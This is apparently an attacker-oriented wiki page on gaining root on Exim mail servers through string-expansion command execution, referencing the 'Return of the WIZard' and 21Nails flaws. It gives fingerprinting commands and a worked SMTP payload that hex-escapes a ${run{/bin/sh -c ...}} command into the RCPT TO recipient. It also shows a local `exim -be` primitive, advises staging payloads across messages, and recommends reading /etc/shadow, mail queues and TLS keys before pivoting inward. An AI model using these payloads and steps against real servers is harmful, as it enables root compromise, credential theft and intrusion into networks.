Exim

Exim is a widely deployed MTA whose configuration language is a string-expansion engine: many config fields are expanded at delivery time, and the ${run{...}} expansion executes an external command. When attacker-controlled data (notably a recipient address) flows into an expanded field under a vulnerable router or ACL configuration, that data reaches the expansion engine and the ${run{...}} operator runs commands. This is the mechanism behind the "Return of the WIZard" remote command execution in Exim's deliver path, and the 21Nails cluster (a set of flaws disclosed together by Qualys) adds further remote and local vectors, including BDAT command handling and local -be/-oMr string-expansion abuse. Exim frequently runs as root, so command execution here is root, not a low-privileged mail user.

Fingerprint#

bash
nc mail.victim.com 25
# 220 mx.victim.com ESMTP Exim 4.92 ...        <- banner names Exim and version
nmap -p25 -sV mail.victim.com                  # confirm product=Exim and the version
exim -bV                                       # local: prints the exact version and config

Match the version against the flaw: the string-expansion deliver RCE affects a broad band of 4.x up to the fixed release, and the 21Nails set spans many 4.x versions; the exact behavior also depends on the site's router/ACL configuration, so a version in range is necessary but not alone sufficient.

Mechanism and worked payload#

The deliver-path RCE is reached by making the recipient local part expand through ${run{...}}. Backslash-hex escapes slip the slashes and spaces past address parsing so the expansion engine sees a runnable command:

text
MAIL FROM:<attacker@attacker.test>
RCPT TO:<${run{\x2Fbin\x2Fsh\x20-c\x20\x22id\x3Enetcat...\x22}}@localhost>
DATA
Received: trigger
.

Here \x2F is /, \x20 is space, \x22 is ": the recipient parses as a local address whose expansion runs /bin/sh -c "...". Delivery to that local address triggers the expansion, and because the delivery process is root the command runs as root. In practice the payload is staged (write a script via one message, execute it via another) because a single RCPT has limited length and character tolerance, and the vulnerable path requires the recipient to be routed to a local-delivery router that expands the address.

For the 21Nails local vectors, -be runs Exim's expansion tester, so exim -be '${run{/bin/sh -c id}}' demonstrates the same primitive locally, and the -oMr and BDAT issues give remote reachability on affected builds.

Variants and follow-on#

  • Config dependence is the key decision point: the remote deliver RCE needs the address to reach an expanding router/ACL. If the default-ish config does not route your crafted local part through expansion, pivot to the 21Nails BDAT vector or to a local vector after any lower-privileged foothold.
  • Root code execution on the mail relay is often perimeter-facing: use it to read /etc/shadow, mail queues, and TLS keys, then pivot inward.

Tools#

References#

Cookie Consent

We use cookies to enhance your experience. Learn more